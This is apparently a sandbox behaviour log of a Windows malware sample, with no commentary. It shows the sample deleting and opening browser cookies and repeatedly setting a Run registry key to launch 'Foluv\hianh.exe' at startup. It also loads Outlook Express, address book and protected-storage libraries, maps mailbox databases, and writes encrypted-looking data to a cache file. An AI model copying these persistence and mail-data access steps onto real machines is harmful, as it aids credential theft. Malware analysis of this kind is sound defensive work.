File other operation Disposition: BasicInformation Data : 00000000000000000000000000000000000000000000000000000000000000008000000000000000 Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[1].txt success or wait 1989436241
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[1].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989436714
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[1].txt success or wait 1989437055
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989437654
File other operation Disposition: BasicInformation Data : 00000000000000000000000000000000000000000000000000000000000000008000000000000000 Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[2].txt success or wait 1989437995
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989438434
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[2].txt success or wait 1989438774
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[3].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989439370
File other operation Disposition: BasicInformation Data : 00000000000000000000000000000000000000000000000000000000000000008000000000000000 Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[3].txt success or wait 1989439711
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[3].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989440148
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[3].txt success or wait 1989440489
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@ch.msn[1].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989441190
File other operation Disposition: BasicInformation Data : 00000000000000000000000000000000000000000000000000000000000000008000000000000000 Path: C:\Documents and Settings\Administrator\Cookies\administrator@ch.msn[1].txt success or wait 1989441533
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@ch.msn[1].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989441966
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@ch.msn[1].txt success or wait 1989442313
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@doubleclick[1].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989442955
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@doubleclick[1].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989443751
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 1989449834
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@ivwbox[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989451819
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@ivwbox[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989452580
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@live[1].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989453586
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@live[1].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989454341
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@live[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989455247
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@live[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989456002
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[1].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989456908
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[1].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989457698
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989458602
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989459356
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[3].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989460314
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[3].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989461374
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@msn[1].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989462295
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@msn[1].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989463081
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@msn[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989464380
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@msn[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989465139
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@msn[3].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989466044
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@msn[3].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989466797
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@rad.msn[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989467734
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@rad.msn[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989468487
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[1].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989469735
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[1].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989470502
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989471424
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989472275
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[4].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989473330
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[4].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989474094
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@wemfbox[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989475133
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@wemfbox[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989475937
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@www.bing[1].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989476856
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@www.bing[1].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989477609
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@www.bing[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989478632
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@www.bing[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989479386
Section loaded Path: C:\WINDOWS\system32\msoeacct.dll Access: write and read and execute Type: commit Baseaddress: 2B50000 Size: 253952 Protection: execute Mapped to pid: own pid success or wait 1989521533
Section loaded Path: C:\WINDOWS\system32\msoeacct.dll Access: write and read and execute Type: commit Baseaddress: 2B50000 Size: 253952 Protection: execute Mapped to pid: own pid success or wait 1989523906
Section loaded Path: C:\WINDOWS\system32\msoeacct.dll Access: query and write and read and execute Type: image Baseaddress: 68810000 Size: 270336 Protection: read write Mapped to pid: own pid success or wait 1989524810
Section loaded Path: \KnownDlls\MSOERT2.dll Access: write and read and execute Type: unknown Baseaddress: 68810000 Size: 270336 Protection: read write Mapped to pid: own pid object name not found 1989526714
Section loaded Path: C:\WINDOWS\system32\msoert2.dll Access: query and write and read and execute Type: image Baseaddress: 76880000 Size: 139264 Protection: read write Mapped to pid: own pid success or wait 1989528707
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 2B60000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 1989544751
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 2B60000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 1989545829
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 2B60000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 1989546779
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 2B80000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 1989563244
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 2B80000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 1989564303
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 2B80000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 1989565270
Section loaded Path: C:\WINDOWS\system32\acctres.dll Access: write and read and execute Type: commit Baseaddress: 2B80000 Size: 65536 Protection: execute Mapped to pid: own pid success or wait 1989580280
Section loaded Path: C:\WINDOWS\system32\acctres.dll Access: write and read and execute Type: commit Baseaddress: 2B80000 Size: 65536 Protection: execute Mapped to pid: own pid success or wait 1989582234
Section loaded Path: C:\WINDOWS\system32\acctres.dll Access: query and write and read and execute Type: image Baseaddress: 71780000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 1989583295
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Account Manager\Accounts Name: NULL success or wait 1989611396
Section loaded Path: C:\Program Files\Common Files\System\wab32.dll Access: write and read and execute Type: commit Baseaddress: 2BA0000 Size: 512000 Protection: execute Mapped to pid: own pid success or wait 1989615001
Section loaded Path: C:\Program Files\Common Files\System\wab32.dll Access: write and read and execute Type: commit Baseaddress: 2BA0000 Size: 512000 Protection: execute Mapped to pid: own pid success or wait 1989616679
Section loaded Path: C:\Program Files\Common Files\System\wab32.dll Access: query and write and read and execute Type: image Baseaddress: 470D0000 Size: 528384 Protection: read write Mapped to pid: own pid success or wait 1989617501
Section loaded Path: C:\Program Files\Common Files\System\wab32res.dll Access: write and read and execute Type: commit Baseaddress: 2BA0000 Size: 249856 Protection: execute Mapped to pid: own pid success or wait 1989626034
Section loaded Path: C:\Program Files\Common Files\System\wab32res.dll Access: write and read and execute Type: commit Baseaddress: 2BA0000 Size: 249856 Protection: execute Mapped to pid: own pid success or wait 1989627733
Section loaded Path: C:\Program Files\Common Files\System\wab32res.dll Access: query and write and read and execute Type: image Baseaddress: 35F40000 Size: 258048 Protection: read write Mapped to pid: own pid success or wait 1989628625
System info queried Type: ProcessInformation success or wait 1989741685
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: 2B80000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 1989744223
Section loaded Path: C:\WINDOWS\system32\msident.dll Access: write and read and execute Type: commit Baseaddress: 2B80000 Size: 53248 Protection: execute Mapped to pid: own pid success or wait 1989817399
Section loaded Path: C:\WINDOWS\system32\msident.dll Access: write and read and execute Type: commit Baseaddress: 2B80000 Size: 53248 Protection: execute Mapped to pid: own pid success or wait 1989819268
Section loaded Path: C:\WINDOWS\system32\msident.dll Access: query and write and read and execute Type: image Baseaddress: 608A0000 Size: 61440 Protection: read write Mapped to pid: own pid success or wait 1989820296
Section loaded Path: C:\WINDOWS\system32\msident.dll Access: read Type: commit Baseaddress: 2B80000 Size: 53248 Protection: readonly Mapped to pid: own pid success or wait 1989827459
Section loaded Path: C:\WINDOWS\system32\msidntld.dll Access: write and read and execute Type: commit Baseaddress: 2B80000 Size: 16384 Protection: execute Mapped to pid: own pid success or wait 1989844568
Section loaded Path: C:\WINDOWS\system32\msidntld.dll Access: write and read and execute Type: commit Baseaddress: 2B80000 Size: 16384 Protection: execute Mapped to pid: own pid success or wait 1989849446
Section loaded Path: C:\WINDOWS\system32\msidntld.dll Access: query and write and read and execute Type: image Baseaddress: 60890000 Size: 24576 Protection: read write Mapped to pid: own pid success or wait 1989850652
System info queried Type: ProcessInformation success or wait 1989859291
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: 2BE0000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 1989862173
Section loaded Path: \KnownDlls\PSTOREC.DLL Access: write and read and execute Type: unknown Baseaddress: 2BE0000 Size: 12288 Protection: read write Mapped to pid: own pid object name not found 1989866440
Section loaded Path: C:\WINDOWS\system32\pstorec.dll Access: query and write and read and execute Type: image Baseaddress: 5E0C0000 Size: 53248 Protection: read write Mapped to pid: own pid success or wait 1989868416
Section loaded Path: C:\Program Files\Outlook Express\msoe.dll Access: write and read and execute Type: commit Baseaddress: 2C70000 Size: 1318912 Protection: execute Mapped to pid: own pid success or wait 1989926876
Section loaded Path: C:\Program Files\Outlook Express\msoe.dll Access: write and read and execute Type: commit Baseaddress: 2C70000 Size: 1318912 Protection: execute Mapped to pid: own pid success or wait 1989929403
Section loaded Path: C:\Program Files\Outlook Express\msoe.dll Access: query and write and read and execute Type: image Baseaddress: 60330000 Size: 1347584 Protection: read write Mapped to pid: own pid success or wait 1989930374
Section loaded Path: \KnownDlls\INETCOMM.dll Access: write and read and execute Type: unknown Baseaddress: 60330000 Size: 1347584 Protection: read write Mapped to pid: own pid object name not found 1989937959
Section loaded Path: C:\WINDOWS\system32\inetcomm.dll Access: query and write and read and execute Type: image Baseaddress: 76150000 Size: 712704 Protection: read write Mapped to pid: own pid success or wait 1989939986
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 1990277613
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 2BE0000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 1990509018
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 2BE0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 1990510127
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 2BE0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 1990516082
Section loaded Path: C:\WINDOWS\system32\inetres.dll Access: write and read and execute Type: commit Baseaddress: 2BF0000 Size: 49152 Protection: execute Mapped to pid: own pid success or wait 1990562375
Section loaded Path: C:\WINDOWS\system32\inetres.dll Access: write and read and execute Type: commit Baseaddress: 2BE0000 Size: 49152 Protection: execute Mapped to pid: own pid success or wait 1990572440
Section loaded Path: C:\WINDOWS\system32\inetres.dll Access: query and write and read and execute Type: image Baseaddress: 2BF0000 Size: 57344 Protection: read write Mapped to pid: own pid conflicting addresses 1990575656
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 2C70000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 1990645314
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 2C70000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 1990648485
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 2C70000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 1990655685
Section loaded Path: C:\Program Files\Outlook Express\msoeres.dll Access: write and read and execute Type: commit Baseaddress: 2C90000 Size: 2482176 Protection: execute Mapped to pid: own pid success or wait 1990707462
Section loaded Path: C:\Program Files\Outlook Express\msoeres.dll Access: write and read and execute Type: commit Baseaddress: 2C90000 Size: 2482176 Protection: execute Mapped to pid: own pid success or wait 1990716750
Section loaded Path: C:\Program Files\Outlook Express\msoeres.dll Access: query and write and read and execute Type: image Baseaddress: 2C90000 Size: 2486272 Protection: read write Mapped to pid: own pid conflicting addresses 1990720162
Section loaded Path: C:\Program Files\Common Files\System\directdb.dll Access: write and read and execute Type: commit Baseaddress: 2EF0000 Size: 90112 Protection: execute Mapped to pid: own pid success or wait 1990806877
Section loaded Path: C:\Program Files\Common Files\System\directdb.dll Access: write and read and execute Type: commit Baseaddress: 2EF0000 Size: 90112 Protection: execute Mapped to pid: own pid success or wait 1990811387
Section loaded Path: C:\Program Files\Common Files\System\directdb.dll Access: query and write and read and execute Type: image Baseaddress: 6CDF0000 Size: 102400 Protection: read write Mapped to pid: own pid success or wait 1990814134
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 1990959212
Section loaded Path: \BaseNamedObjects\microsoft_thor_folder_notifyinfo_mappedfile Access: query and write and read Type: commit Baseaddress: 2C70000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 1991000695
System info queried Type: ProcessInformation success or wait 1991004068
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: 2F30000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 1991010793
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 1991689238
Section loaded Path: \NLS\NlsSectionCP20127 Access: read Type: unknown Baseaddress: 2F30000 Size: 69632 Protection: readonly Mapped to pid: own pid success or wait 1992023893
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin Offset: none Length: 4096 Value: E8 C1 69 AB 94 52 1E 42 DD C3 DA FA EB 82 38 2A B0 03 29 3A 73 7F 61 22 EC 5F 7B E6 1F F6 F6 81 FE 5D B8 7D 34 14 36 02 95 58 0C 87 50 BC 83 6D DF 05 38 CE BC 67 16 7D 31 6E 30 C4 6E 8C 79 D4 89 44 F5 FC 05 4C CC 6A 75 74 38 5E 51 74 C5 E3 7A 6D 52 F7 F8 3C 52 43 7E CE B5 41 E0 E8 B0 C8 0D B9 6D 80 success or wait 1992345188
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 1992441373
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin Offset: none Length: 4096 Value: 4B A0 43 33 C1 56 F2 0D 6D 52 6F D7 8D 83 39 5D C1 F9 66 58 E3 98 C7 F3 71 C2 06 68 82 AF 9D 81 FF BE 63 E1 5F A8 52 D2 90 C3 E9 24 3D 78 5F 5D 79 66 A8 56 C3 F2 73 44 CF E3 1E 10 22 3A CC 01 66 54 46 51 88 FA 51 47 33 1C 46 77 81 CC A8 08 1C 68 AA A3 A2 49 1E 71 ED B4 08 B0 D9 BF FE 80 A5 A4 E0 5E success or wait 1992542998
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin Offset: none Length: 4096 Value: AD 0F E4 12 EE 04 3B C8 AB 15 36 28 0D 06 3B 69 EE 2C 34 F2 B3 4F F9 F3 E9 08 DE AD DF B9 81 B3 8B A0 AD 09 9B FE 6A 6A 2C 25 4A 46 90 80 F1 7A 5E CE 5A 09 5C 0A 51 0B D0 10 EA 6A AB DF AF 4A 51 89 6E BB 3B 58 74 5F 1E 5B 74 DA 80 AA 25 47 3B 6E AF AE E5 A5 79 4E 8A EF 85 43 27 0B A1 99 F1 53 BD AD success or wait 1992547803
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin Offset: none Length: 4096 Value: 40 7A AA FC DC 6F 3E FD A6 8D F1 9E 4D 06 D4 91 0E F6 DF BE 36 13 0E C4 87 9F CC AD BC FA C4 B3 7D 98 B6 30 8E A3 CB 3C 56 8D AD 7D CD E4 9B 60 6C B4 0B DE 81 11 A6 60 25 10 A9 B5 A4 67 DD 5B 28 D1 CF 5E AD AF 85 88 49 2A 72 F6 11 20 D3 A0 36 42 9A B4 20 69 22 FD 97 B3 EB 12 54 17 66 09 E7 99 79 B4 success or wait 1992550143
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin Offset: none Length: 4096 Value: 69 0A 5D 0F E8 28 EF D7 83 3F D5 75 BB 9E B2 D6 1E AB 97 EB C2 FD A9 AA 75 FF 38 73 9F 6E F6 93 64 69 0D 8E 6F 8F 20 72 19 86 E9 9D BF 5A 51 91 56 D2 82 06 3A EB E5 3F BF C8 D7 D5 BE F5 ED 95 12 F1 7F CF A4 41 CF 62 94 06 A1 E1 C8 F7 70 32 0A E9 5B CA CC CD EC 60 E4 22 99 22 D4 56 96 38 EB 55 42 97 success or wait 1992746103
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin Offset: none Length: 4096 Value: 06 E6 19 3F F2 33 1F 1F 6E 49 0C 0F BB 9D 5B B0 7B AF AF 26 F2 57 DB 20 4C 9F 88 97 15 B1 77 C8 7A 04 D9 06 C8 77 42 58 16 4B CA F6 87 57 6B 22 61 AC 13 88 B4 D6 0A 4D 35 9C F3 E1 75 40 D0 6C 9F 65 27 7F 56 1C 67 C9 FF 08 21 A7 D0 88 D0 87 B0 C7 CB 4F 2A 32 DA 07 C4 F3 32 9D E1 AF 47 11 B7 86 1D 26 success or wait 1992749014
System info queried Type: ProcessInformation success or wait 1992793032
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin Offset: none Length: 4096 Value: F5 0A 07 02 C0 AD 24 83 3D ED 6B 4A EB 83 BA 5E 31 C1 6A 1F 83 E6 CB 3C 91 E1 9B FA 32 AD 28 4D BC D6 4B EF D1 E2 13 83 C3 4D 11 94 AA 3F 75 87 FC EB 0B 01 DC 20 C0 71 44 74 D8 BF CB 6B 24 CD B0 A4 58 6D C2 8B 7E C5 09 4E 3F F1 B0 C2 23 B4 54 92 9A 21 EA 50 BB 3A 96 14 06 D2 D2 3C 6F F9 D8 EC 83 EE success or wait 1992799817
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: 2FC0000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 1992801824
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin Offset: none Length: 4096 Value: 99 21 0E BB BA 67 24 15 C4 64 3C 37 3D 6C 54 0B 5A CF FB C6 AC 08 5C 2C 48 C2 7D F6 DE 31 94 AE EA C8 39 B6 06 07 60 63 D4 89 B0 9F 07 53 24 95 12 99 B1 6C A3 0C 8B 73 D5 78 07 8B A1 BB 93 3E 35 3E A8 04 03 F0 A1 92 CA 8B 6F 35 EE BE 33 99 2A 81 23 2D 0F 24 40 0F CA 8C 06 42 D1 E1 19 22 48 4F D4 E4 success or wait 1992900646
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin Offset: none Length: 4096 Value: 64 86 61 BB EB F4 CF 9F 97 BF 46 C0 FF F4 19 94 0A 0C 2C 70 41 F3 3F A1 3A 02 E2 32 66 48 39 4C EB 9B 1E 99 D7 79 0F 60 6F C5 1E 58 12 2B 7A 79 AF 0C F0 D5 E9 40 45 1F BC D7 9B A1 DA DB 1B 9A A9 14 1E 42 32 ED 88 A4 FC F1 09 B5 45 26 FC 3B 96 18 25 E2 2D D8 1D 82 69 0F 29 8D 7A 23 60 6C A1 9E E0 CA success or wait 1992967609
Section loaded Path: \BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_folders.dbx_directdbshare Access: query and write and read and execute and extend size Type: unknown Baseaddress: 2FC0000 Size: 12288 Protection: read write Mapped to pid: own pid object name not found 1992985862
Section loaded Path: \BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_folders.dbx_directdbshare Access: query and write and read Type: commit Baseaddress: 2FC0000 Size: 28672 Protection: read write Mapped to pid: own pid success or wait 1992986329
Section loaded Path: \BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_folders.dbx_directdbfilemap Access: query and write and read and execute and extend size Type: unknown Baseaddress: 2FC0000 Size: 28672 Protection: read write Mapped to pid: own pid object name not found 1992987764
Section loaded Path: \BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_folders.dbx_directdbfilemap Access: query and write and read Type: commit Baseaddress: 2FD0000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 1992988224
Section loaded Path: \BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_folders.dbx_directdbfilemap Access: query and write and read and execute and extend size Type: unknown Baseaddress: 2FD0000 Size: 12288 Protection: read write Mapped to pid: own pid object name not found 1992996648
Section loaded Path: \BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_folders.dbx_directdbfilemap Access: query and write and read Type: commit Baseaddress: 2FE0000 Size: 77824 Protection: read write Mapped to pid: own pid success or wait 1992997136
Section loaded Path: \BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_inbox.dbx_directdbshare Access: query and write and read and execute and extend size Type: unknown Baseaddress: 2FE0000 Size: 77824 Protection: read write Mapped to pid: own pid object name not found 1993028901
Section loaded Path: \BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_inbox.dbx_directdbshare Access: query and write and read Type: commit Baseaddress: 3010000 Size: 28672 Protection: read write Mapped to pid: own pid success or wait 1993029386
Section loaded Path: \BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_inbox.dbx_directdbfilemap Access: query and write and read and execute and extend size Type: unknown Baseaddress: 3010000 Size: 28672 Protection: read write Mapped to pid: own pid object name not found 1993030864
Section loaded Path: \BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_inbox.dbx_directdbfilemap Access: query and write and read Type: commit Baseaddress: 3020000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 1993031344
Section loaded Path: \BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_inbox.dbx_directdbfilemap Access: query and write and read and execute and extend size Type: unknown Baseaddress: 3020000 Size: 12288 Protection: read write Mapped to pid: own pid object name not found 1993042693
Section loaded Path: \BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_inbox.dbx_directdbfilemap Access: query and write and read Type: commit Baseaddress: 3030000 Size: 77824 Protection: read write Mapped to pid: own pid success or wait 1993043217
Section loaded Path: C:\Program Files\Common Files\System\wab32.dll Access: write and read and execute Type: commit Baseaddress: 3050000 Size: 512000 Protection: execute Mapped to pid: own pid success or wait 1993045686
Section loaded Path: C:\Program Files\Common Files\System\wab32.dll Access: write and read and execute Type: commit Baseaddress: 3050000 Size: 512000 Protection: execute Mapped to pid: own pid success or wait 1993046565
